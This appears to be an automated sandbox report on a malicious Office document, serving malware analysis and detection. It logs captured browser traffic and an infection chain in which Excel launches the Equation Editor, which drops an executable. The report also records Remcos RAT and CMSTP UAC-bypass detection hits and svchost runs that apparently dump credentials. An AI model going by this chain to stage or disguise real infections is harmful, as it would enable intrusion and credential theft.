2024-05-02 02:56:11 UTC	742	OUT	GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMmBzLEGIjB5NrDOyf958iCbJpAJxeAyyHGDgUuUJYBV60K9olc20v99BBChXQUVByr6JLh_QvcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-02-02; NID=513=nQDSKKCUY72nbduCHcRHhXACOPv96Kxy9BGRkfztkyu42Rwrd_gHXoam_RmDAYCnj8eZlKgLn5fWew08N8kSyFNPm8WqA8IlPx75gPq5HjHDBfOIlzDJCalLIF09aVWJgIdxbVFWcdPC2s7k68aYWtAFmlXnyKvJy0ZNSikFz3w
2024-05-02 02:56:11 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 02 May 2024 02:56:11 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3131 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 02:56:11 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 3f 61 73 79 6e 63 3d 6e 74 70 3a 32 3c 2f 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/ddljson?async=ntp:2</title>
2024-05-02 02:56:11 UTC	1255	IN	Data Raw: 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 78 42 57 4a 34 78 44 4a 76 6e 4b 7a 45 32 49 52 49 77 77 72 79 50 69 77 52 67 39 Data Ascii: tCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="xBWJ4xDJvnKzE2IRIwwryPiwRg9
2024-05-02 02:56:11 UTC	977	IN	Data Raw: 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e Data Ascii: ears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the mean

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49177	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 02:56:11 UTC	848	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMqBzLEGIjAmi-UIIFqSTjkw-RfWXi2GfkOK6xdeNQDHNk-OB5e4eww8XVW3FAYyUUV3pTR2uxYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-02-02; NID=513=nQDSKKCUY72nbduCHcRHhXACOPv96Kxy9BGRkfztkyu42Rwrd_gHXoam_RmDAYCnj8eZlKgLn5fWew08N8kSyFNPm8WqA8IlPx75gPq5HjHDBfOIlzDJCalLIF09aVWJgIdxbVFWcdPC2s7k68aYWtAFmlXnyKvJy0ZNSikFz3w
2024-05-02 02:56:11 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 02 May 2024 02:56:11 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3185 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 02:56:11 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-05-02 02:56:11 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 77 67 41 4f 54 5a 46 44 57 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="wgAOTZFDW
2024-05-02 02:56:11 UTC	1031	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49179	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 02:56:13 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMuBzLEGIjDHkOYETEkfpPO5BNVM4qFB3EzErW1N_BxHwWaZNSSd6fpa03DeWClTlQmn-8-Tj7IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-02-02; NID=513=fgAQ-FMftBn8U6qLB_xWWkkkc9DVEvN_N6o2tEue_K4GUZExVgaPgdzwdYTojqKVxXyKNrqWVPheSLnkhhM1Yn5U2V873JQdGiigIZ_Y-T9zYj0D29_T15mASCX6KaFQVRLJg0wObsmDE1eXTDGt31FHclpLdrGt-svEoASRDdY
2024-05-02 02:56:14 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 02 May 2024 02:56:14 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3113 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 02:56:14 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-05-02 02:56:14 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 4c 49 67 33 4b 5a 45 6c 73 31 56 76 79 78 5f 70 2d 30 48 59 71 57 41 72 73 43 6d 62 4b 6a 57 5a 5f Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="LIg3KZEls1Vvyx_p-0HYqWArsCmbKjWZ_
2024-05-02 02:56:14 UTC	959	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Target ID:	0
Start time:	04:54:02
Start date:	02/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f1f0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	04:54:51
Start date:	02/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:54:52
Start date:	02/05/2024
Path:	C:\Users\user\AppData\Roaming\YED.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\YED.exe
Imagebase:	0x210000
File size:	1'402'368 bytes
MD5 hash:	9ABB13386C543EB5FEA7DEA95EB86D26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:55:55
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x13f990000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	04:55:57
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1452,i,15568989383610033621,8608539169459799112,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x13f990000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	04:56:02
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x13f990000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:56:03
Start date:	02/05/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=892 --field-trial-handle=1396,i,13358231411772672971,2555512376125685792,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x13f990000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:57:08
Start date:	02/05/2024
Path:	C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\YED.exe
Imagebase:	0x1080000
File size:	108'357'120 bytes
MD5 hash:	A8004A594D5D55F5A5F5ABDBB8001FA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:57:09
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\YED.exe
Imagebase:	0xdf0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	04:57:12
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr"
Imagebase:	0xdf0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:57:12
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb"
Imagebase:	0xdf0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	04:57:12
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce"
Imagebase:	0xdf0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	80.5%
Total number of Nodes:	696
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 035005E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(03500523,0350053A,00000000,00000000,00000000,?,0350053A,03500523,00000000,00000000,00000000,00000000,035004DC,00000050,00000000), ref: 03500632

Strings

seHandle, xrefs: 03500641

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: FileWrite
String ID: seHandle
API String ID: 3934441357-3114118676
Opcode ID: 18553326b85a00a69889a48aee1867741f33fb832c981e95635d7b85ca4053e9
Instruction ID: 5b6538c0871243ce67f6dc38e3bfcb57ed416cf301924dd45cde5cde91454251
Opcode Fuzzy Hash: 18553326b85a00a69889a48aee1867741f33fb832c981e95635d7b85ca4053e9
Instruction Fuzzy Hash: 4021A4704083456AD711FAA0ED45F6FBBAAFBC1B10F148E0DF1914B0F1E6B6D5088AA6

Uniqueness

Uniqueness Score: -1.00%

Function 03500292 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C, xrefs: 03500292

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: CreateExitFileProcess
String ID: C
API String ID: 2838702978-1677776730
Opcode ID: a987d9aec161237c093e9e42f52555f13ade90e88a6126b19d59bf0814b6e1ba
Instruction ID: a4706a3c82d065e544e17ae69468243da1608abc52ced4a9b2efc9a5e21ee3b9
Opcode Fuzzy Hash: a987d9aec161237c093e9e42f52555f13ade90e88a6126b19d59bf0814b6e1ba
Instruction Fuzzy Hash: 8831EE6180D3C05FD712D7306E5A7A4BF607B13500F0D8ADBC4C94F1F3E2A6924A936A

Uniqueness

Uniqueness Score: -1.00%

Function 035005AB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

seHandle, xrefs: 03500641

Memory Dump Source

Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd

Similarity

API ID: FileWrite
String ID: seHandle
API String ID: 3934441357-3114118676
Opcode ID: d34d02f4a8ccd5734fb77dc4fe02df7d8690f4fc7bcc259526d2b40a5bd39fd5
